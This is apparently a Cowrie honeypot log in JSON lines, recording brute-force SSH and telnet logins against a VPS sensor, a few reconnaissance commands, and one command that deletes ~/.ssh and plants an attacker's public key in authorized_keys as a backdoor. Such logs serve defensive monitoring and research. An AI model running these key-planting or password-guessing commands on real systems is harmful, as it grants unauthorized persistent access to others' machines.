{"eventid":"cowrie.session.connect","src_ip":"69.164.213.123","src_port":43230,"dst_ip":"1.2.3.4","dst_port":23,"session":"0fe000d83e4f","protocol":"telnet","message":"New connection: 69.164.213.123:43230 (1.2.3.4:23) [session: 0fe000d83e4f]","sensor":"my-vps","timestamp":"2025-08-28T22:02:54.705223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:02:55.213696Z","src_ip":"201.148.180.50","session":"05b3d182a5b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:02:55.214477Z","src_ip":"201.148.180.50","session":"05b3d182a5b7"}
{"eventid":"cowrie.session.closed","duration":1.5245954990386963,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:56.229755Z","src_ip":"69.164.213.123","session":"0fe000d83e4f"}
{"eventid":"cowrie.session.connect","src_ip":"69.164.213.123","src_port":43238,"dst_ip":"1.2.3.4","dst_port":23,"session":"2188ca9f7024","protocol":"telnet","message":"New connection: 69.164.213.123:43238 (1.2.3.4:23) [session: 2188ca9f7024]","sensor":"my-vps","timestamp":"2025-08-28T22:02:56.428897Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58574,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5c331b4d921","protocol":"ssh","message":"New connection: 217.72.205.35:58574 (1.2.3.4:22) [session: d5c331b4d921]","sensor":"my-vps","timestamp":"2025-08-28T22:02:56.682363Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:56.683899Z","src_ip":"217.72.205.35","session":"d5c331b4d921"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T22:02:57.033569Z","src_ip":"69.164.213.123","session":"2188ca9f7024"}
{"eventid":"cowrie.session.closed","duration":3.3785011768341064,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:02:59.807322Z","src_ip":"69.164.213.123","session":"2188ca9f7024"}
{"eventid":"cowrie.session.connect","src_ip":"69.164.213.123","src_port":43254,"dst_ip":"1.2.3.4","dst_port":23,"session":"5888361923dd","protocol":"telnet","message":"New connection: 69.164.213.123:43254 (1.2.3.4:23) [session: 5888361923dd]","sensor":"my-vps","timestamp":"2025-08-28T22:02:59.889017Z"}
{"eventid":"cowrie.session.closed","duration":0.9719419479370117,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:03:00.860879Z","src_ip":"69.164.213.123","session":"5888361923dd"}
{"eventid":"cowrie.session.connect","src_ip":"69.164.213.123","src_port":48440,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c3c038ab5e0","protocol":"telnet","message":"New connection: 69.164.213.123:48440 (1.2.3.4:23) [session: 2c3c038ab5e0]","sensor":"my-vps","timestamp":"2025-08-28T22:03:00.975282Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-28T22:03:01.648444Z","src_ip":"69.164.213.123","session":"2c3c038ab5e0"}
{"eventid":"cowrie.login.success","username":"root","password":"[UNKNOWNorV70]","message":"login attempt [root/[UNKNOWNorV70]] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:03:02.566912Z","src_ip":"201.148.180.50","session":"05b3d182a5b7"}
{"eventid":"cowrie.session.closed","duration":2.7033870220184326,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:03:03.678597Z","src_ip":"69.164.213.123","session":"2c3c038ab5e0"}
{"eventid":"cowrie.session.connect","src_ip":"69.164.213.123","src_port":48448,"dst_ip":"1.2.3.4","dst_port":23,"session":"c5b8a6b8a791","protocol":"telnet","message":"New connection: 69.164.213.123:48448 (1.2.3.4:23) [session: c5b8a6b8a791]","sensor":"my-vps","timestamp":"2025-08-28T22:03:03.805296Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:03:04.435526Z","src_ip":"69.164.213.123","session":"c5b8a6b8a791"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:03:04.452449Z","src_ip":"69.164.213.123","session":"c5b8a6b8a791"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T22:03:04.655957Z","src_ip":"69.164.213.123","session":"c5b8a6b8a791"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:03:05.319680Z","src_ip":"201.148.180.50","session":"05b3d182a5b7"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T22:03:05.320438Z","src_ip":"201.148.180.50","session":"05b3d182a5b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:03:05.757771Z","src_ip":"69.164.213.123","session":"c5b8a6b8a791"}
{"eventid":"cowrie.session.closed","duration":1.9565017223358154,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:03:05.761698Z","src_ip":"69.164.213.123","session":"c5b8a6b8a791"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:03:07.428792Z","src_ip":"201.148.180.50","session":"05b3d182a5b7"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:03:07.430070Z","src_ip":"201.148.180.50","session":"05b3d182a5b7"}
{"eventid":"cowrie.session.connect","src_ip":"3.137.73.221","src_port":35880,"dst_ip":"1.2.3.4","dst_port":22,"session":"48fac2a08a60","protocol":"ssh","message":"New connection: 3.137.73.221:35880 (1.2.3.4:22) [session: 48fac2a08a60]","sensor":"my-vps","timestamp":"2025-08-28T22:03:15.430556Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xbaza\\xe3\\x98p\\xd8\\xf9\\xb8\\xd4l`\\xa5{9A$\\x8f\\x8c\u0002\\xdb\b!\u0000\\x9aD{Vv\t\\xef\\xd2\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xbaza\\xe3\\x98p\\xd8\\xf9\\xb8\\xd4l`\\xa5{9A$\\x8f\\x8c\u0002\\xdb\b!\u0000\\x9aD{Vv\t\\xef\\xd2\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T22:03:15.431888Z","src_ip":"3.137.73.221","session":"48fac2a08a60"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:03:15.433005Z","src_ip":"3.137.73.221","session":"48fac2a08a60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50878,"dst_ip":"1.2.3.4","dst_port":22,"session":"236ed58e4a68","protocol":"ssh","message":"New connection: 212.227.235.229:50878 (1.2.3.4:22) [session: 236ed58e4a68]","sensor":"my-vps","timestamp":"2025-08-28T22:04:05.273283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T22:04:05.274597Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T22:04:05.566754Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.login.success","username":"root","password":"Ys123456!","message":"login attempt [root/Ys123456!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:04:06.692245Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:04:07.245505Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T22:04:07.246185Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T22:04:07.246983Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:04:07.518375Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:04:08.583649Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T22:04:08.584451Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T22:04:08.855965Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:04:08.856906Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.session.connect","src_ip":"3.137.73.221","src_port":34712,"dst_ip":"1.2.3.4","dst_port":22,"session":"48a65fc98e9e","protocol":"ssh","message":"New connection: 3.137.73.221:34712 (1.2.3.4:22) [session: 48a65fc98e9e]","sensor":"my-vps","timestamp":"2025-08-28T22:04:08.894727Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003h\\xc8\\xd3-\\x88\\xe0\\xfe9R(\\x8b\u0013'\\xa6z\u0006\u0099K\\xd1/4}\f!\u0005\\x96\\x83\\x86\\\\xb1\\xa4\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003h\\xc8\\xd3-\\x88\\xe0\\xfe9R(\\x8b\u0013'\\xa6z\u0006\u0099K\\xd1/4}\f!\u0005\\x96\\x83\\x86\\\\xb1\\xa4\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T22:04:08.895638Z","src_ip":"3.137.73.221","session":"48a65fc98e9e"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:04:08.896477Z","src_ip":"3.137.73.221","session":"48a65fc98e9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52504,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9396b83daf9","protocol":"ssh","message":"New connection: 212.227.235.229:52504 (1.2.3.4:22) [session: d9396b83daf9]","sensor":"my-vps","timestamp":"2025-08-28T22:04:09.119482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T22:04:09.120479Z","src_ip":"212.227.235.229","session":"d9396b83daf9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T22:04:09.387071Z","src_ip":"212.227.235.229","session":"d9396b83daf9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T22:04:10.463219Z","src_ip":"212.227.235.229","session":"d9396b83daf9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:04:11.731100Z","src_ip":"212.227.235.229","session":"d9396b83daf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52946,"dst_ip":"1.2.3.4","dst_port":22,"session":"c54e59e33685","protocol":"ssh","message":"New connection: 212.227.235.229:52946 (1.2.3.4:22) [session: c54e59e33685]","sensor":"my-vps","timestamp":"2025-08-28T22:04:11.995959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T22:04:11.996867Z","src_ip":"212.227.235.229","session":"c54e59e33685"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T22:04:12.263122Z","src_ip":"212.227.235.229","session":"c54e59e33685"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:04:13.328326Z","src_ip":"212.227.235.229","session":"c54e59e33685"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:04:13.602525Z","src_ip":"212.227.235.229","session":"c54e59e33685"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:04:13.605335Z","src_ip":"212.227.235.229","session":"236ed58e4a68"}
{"eventid":"cowrie.session.connect","src_ip":"3.137.73.221","src_port":51400,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e67e7d062d1","protocol":"ssh","message":"New connection: 3.137.73.221:51400 (1.2.3.4:22) [session: 8e67e7d062d1]","sensor":"my-vps","timestamp":"2025-08-28T22:04:42.895782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:04:42.896602Z","src_ip":"3.137.73.221","session":"8e67e7d062d1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T22:04:43.033904Z","src_ip":"3.137.73.221","session":"8e67e7d062d1"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:04:52.895917Z","src_ip":"3.137.73.221","session":"8e67e7d062d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41294,"dst_ip":"1.2.3.4","dst_port":22,"session":"36f15426abaa","protocol":"ssh","message":"New connection: 212.227.125.160:41294 (1.2.3.4:22) [session: 36f15426abaa]","sensor":"my-vps","timestamp":"2025-08-28T22:05:00.019445Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:05:00.124923Z","src_ip":"212.227.125.160","session":"36f15426abaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41306,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e07424c9fbd","protocol":"ssh","message":"New connection: 212.227.125.160:41306 (1.2.3.4:22) [session: 3e07424c9fbd]","sensor":"my-vps","timestamp":"2025-08-28T22:05:00.204451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:05:00.205201Z","src_ip":"212.227.125.160","session":"3e07424c9fbd"}
